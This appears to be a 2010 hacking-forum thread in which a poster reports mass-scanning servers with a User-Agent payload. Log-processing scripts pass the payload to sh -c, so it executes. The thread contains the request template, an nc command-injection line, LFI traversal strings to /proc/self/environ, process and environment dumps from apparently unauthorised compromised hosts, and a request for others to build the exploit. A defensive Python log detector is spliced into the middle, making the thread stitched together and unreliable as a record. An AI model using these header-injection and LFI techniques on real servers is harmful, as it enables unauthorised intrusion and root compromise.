UstupidMF Posted June 25, 2010 (edited)

So, for about 2 weeks I've been struggling with my CGI scanner and with LFIs. As a joke I put this into it:

sprintf(get,"GET %s%s HTTP/1.1\r\nAccept: */*\r\nAccept-Language: en-us\r\nAccept-Encoding: gzip, deflate\r\nUser-Agent: ystem(\'cd etc ... r\nHost: %s\r\nConnection: Close\r\n\r\n",dir,file,ip);

and started going after all kinds of LFIs. As soon as I launched the scan I saw a lot of servers coming back with uid 0, which is very strange. I kept looking through them to understand what was going on and how I was getting root directly. It only confused me more:

6788 ? S 0:00 /realsentry/wsp/gui/interface/bin/wsp-gui -k restart
9573 ? Ss 0:00 /realsentry/wsp/tools/php/php -q /realsentry/wsp/tools/superd/superd.php
9814 ? SN 0:00 sh -c php /realsentry/wsp/gui/core/tools_system/send_syslog.php '[bLOCKED INTERNAL][2581809048] : 2010/06/21 18:44:01 - HEADER(3): User-Agent = ystem('cd MF is Back; Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)'

That was bug 1.

21130 ? S 0:01 /usr/bin/perl -w /var/log/apache2/folderize /var/log/apache2
10573 ? S 0:00 sh -c echo '74.54.0.0 - - [21/Jun/2010:19:18:59 +0200] "GET HTTP/1.1 HTTP/1.1" 400 351 "-" "ystem('cd MF is Back; Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"' >> "/var/log/apache2/vhost_ip.log"
sh-2.05b# sent 32, rcvd 10248

The second one:

2029 ? S 0:00 /usr/bin/perl /usr/imjm/scripts/access2msg.pl
2031 ? S 14:54 /usr/bin/perl /usr/imjm/scripts/access2msg_healthcheck.pl
2032 ? S 6:57 /usr/bin/perl /usr/imjm/scripts/access2msg_localhost.pl
2350 ? S 0:00 sh -c echo '94.199.0.0 - - [20/Jun/2010:02:39:28 +0900] "GET /index.php?_SERVER[ConfigFile]=../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 403 211 "-" "ystem('cd MF is Back; Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)" 124.110.94.18 80 983 -' >> /tmp/access_count/mon_err_log_localhost

The third one:

cat /proc/2733/cmdline
sh-cecho '74.54.0.0 - - [21/Jun/2010:23:45:22 +0900] "GET /index.php?mode=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 281 "ystem('cd MF is Back; Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)" - -' >> /tmp/access_count/accesslog

This one scared me:

25977 ? SN 0:00 sh -c /bin/bash -c 'CL="0"; CT=0; for ((i=0;i<=128;i++)); do if [ -z "$(sudo mpt-status -i $i -s 2>&1 | egrep "no SCSI disks attached|mptctl")" ]; then let CT=$CT+$(sudo mpt-status -i $i -s | egrep -v "(OPTIMAL|ONLINE)" | wc -l); CL="1"; fi; done; ([ "${CL}" -eq "0" ] && echo 1) || echo ${CT}'
24728 ? D 0:08 /usr/bin/webalizer -c /var/www/web33/.configs/webalizer.conf
19858 ? Ss 0:00 /bin/bash -c /usr/share/confixx/runwebalizer.sh

I quickly called buffer over to help me, and we found another bug:

echo -n -e "GET / HTTP/1.1\r\nAccept: */*\r\nAccept-Language: en-us\r\nAccept-Encoding: gzip, deflate\r\nUser-Agent: ';ping yahoo.com;'\r\nHost: ip atacat\r\n\r\n" |nc ip atacat 80

There is surely one vulnerability that ties all of these together, it's just that I'm not able to find it. They've got me completely confused; if you have any idea and want more details, leave me a message.

realsentry/wsp/tools/php/php /realsentry/wsp/gui/core/parser/parser.php 1 idi1 graceful
Warning: fopen(/dev/fd/0): failed to open stream: No such device or address in /realsentry/wsp/gui/core/parser/parser.php on line 12
/dev/fd/0
/realsentry/wsp/tools/php/php -q /realsentry/wsp/tools/superd/superd.php od
[2010/06/21 18:58:33][10825] [iNFO] SUPERD: Resuming normal operation (pid 10825)
[2010/06/21 18:58:33][10825] [iNFO] SUPERD: Security database clean up.
[2010/06/21 18:58:33][10825] [iNFO] SUPERD: No logs security found
[2010/06/21 18:58:33][10825] [iNFO] SUPERD: Check disks status.
[2010/06/21 18:58:33][10825] [iNFO] SUPERD: Check the size of log files with no rotation configured.
/bin/sh: line 6: 10825 Killed /realsentry/wsp/tools/php/php -q /realsentry/wsp/tools/superd/superd.php
/usr/bin/perl /usr/imjm/scripts/access2msg_md.pl
/bin/sh /command/svscanboot

$outpath = "/tmp/access_count";
if( ! mkdir( $work ) ){
    unlink( $pidfile ) or &logger( "WAR: Can't remove $pidfile" );
    &error_exit( $@, "WAR: Can't make $work" );
}
chmod( 0711, $work );
chown( "root", "pf", $work );
}

ls -all /tmp/access_count/accesslog
-rw-r--r-- 1 red swing 0 Jun 22 02:57 /tmp/access_count/accesslog
2.4.21-37.EL #1 Wed Sep 7 13:35:21 EDT 2005 i686 i686 i386 GNU/Linux
uid=1000(red) gid=1000(swing) groups=1000(swing)
sh: no job control in this shell
sh-2.05b$

Don't be peasants and keep it to yourselves; I hope I'll get a message with the developed exploit.

Credits: xbuffer and me

[0] => /opt/7i/lib/_Bin/_1a_Controller/_7iExec/7iExecCron.php
[1] => -e
[2] => 7iBoxCron.Exec;
)
_SERVER["argc"] => 3
_ENV["SHELL"] => /bin/sh
_ENV["PATH"] => /usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
_ENV["PWD"] => /root
_ENV["LANG"] => en_US.ISO-8859-15
_ENV["SHLVL"] => 1
_ENV["HOME"] => /root
_ENV["LOGNAME"] => root
_ENV["_"] => /opt/7i/lib/_Bin/_1a_Controller/_7iExec/7iExecCron.php
_GET["SessionProcess"] => 7iExecMain.php
_GET["SessionPriority"] => High
_GET["SessionId"] => a9627114cdf99d5be8547af0d51d1daa
_GET["Download"] => 0
_GET["DownloadFile"] =>
_GET["SessionEvalstring"] => ; include_once('/opt/7i/lib/_Bin/_1a_Controller/_Controller/_controllermain.inc'); _ControllerMain('0','a9627114cdf99d5be8547af0d51d1daa','','',$_COOKIE,$_ENV,$_FILES,$_GET,$_POST,@$GLOBALS['HTTP_RAW_POST_DATA'],$_SERVER,'','');
_SERVER["SHELL"] => /bin/sh
_SERVER["PATH"] => /usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

Edited June 25, 2010 by UstupidMF
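A defender-side counterpart to the log lines quoted in the post, added here as an example and not code from the thread or its author: it parses Apache combined-format access log lines and flags the two things the process listings above show, a request traversing to /proc/self/environ and a User-Agent header carrying a code call or shell-breaking quotes. The sample lines are constructed, modelled on those in the post.

```python
import re
from urllib.parse import unquote

# Apache "combined" format: ip ident user [time] "request" status size "referer" "user-agent"
COMBINED_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)
# Traversal ending at /proc/self/environ, optionally with the %00 null byte seen in the thread;
# the request is percent-decoded first so encoded "..%2F" variants are caught as well.
ENVIRON_RE = re.compile(r'(\.\./|\.\.\\).*proc/self/environ(\x00|%00)?', re.IGNORECASE)
# A function call with a quoted argument, e.g. ystem('cd ...), or a PHP open tag in a header:
# that is the payload an include of /proc/self/environ would execute.
CODE_IN_HEADER_RE = re.compile(r'<\?|\w+\s*\(\s*[\'"]')
# Quote and shell metacharacters in a header: these break out of a log line that a script builds
# with sh -c "echo '...' >> logfile", the pattern in the thread's process listings. Semicolons
# are left out on purpose, since every ordinary Mozilla-style User-Agent contains them.
SHELL_META_RE = re.compile(r'[\'`|$]')

def classify(line):
    """Return the finding labels for one log line; an empty list means nothing suspicious."""
    m = COMBINED_RE.match(line)
    if not m:
        return ['unparsed']
    findings = []
    request = unquote(m.group('request'))
    ua = m.group('ua')
    if ENVIRON_RE.search(request):
        findings.append('lfi_proc_self_environ')
    if CODE_IN_HEADER_RE.search(ua):
        findings.append('code_in_user_agent')
    if SHELL_META_RE.search(ua):
        findings.append('shell_metachar_in_user_agent')
    return findings

def scan(lines):
    """Map every log line that triggers at least one finding to its list of findings."""
    return {line: found for line in lines if (found := classify(line))}

# Constructed sample log, modelled on the lines quoted in the thread (one benign line first)
SAMPLE_LOG = [
    '10.0.0.5 - - [21/Jun/2010:19:00:00 +0200] "GET /index.php?mode=home HTTP/1.1" 200 1024 "-" '
    '"Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"',
    '74.54.0.0 - - [21/Jun/2010:23:45:22 +0900] "GET /index.php?mode=../../../../proc/self/environ%00 '
    'HTTP/1.1" 404 281 "-" "ystem(\'cd MF is Back; Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"',
    '10.0.0.9 - - [22/Jun/2010:02:57:00 +0200] "GET / HTTP/1.1" 200 512 "-" "\';ping yahoo.com;\'"',
]

if __name__ == '__main__':
    for line, found in scan(SAMPLE_LOG).items():
        print(', '.join(found), '<-', line)
```

Running it on a real access log is a matter of replacing SAMPLE_LOG with the file's lines; the 'unparsed' label marks lines in a different log format, like the third listing in the post, rather than silently skipping them.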
Guest Nemessis Posted June 25, 2010

Are you still alive, man? Kiss Goofy for me.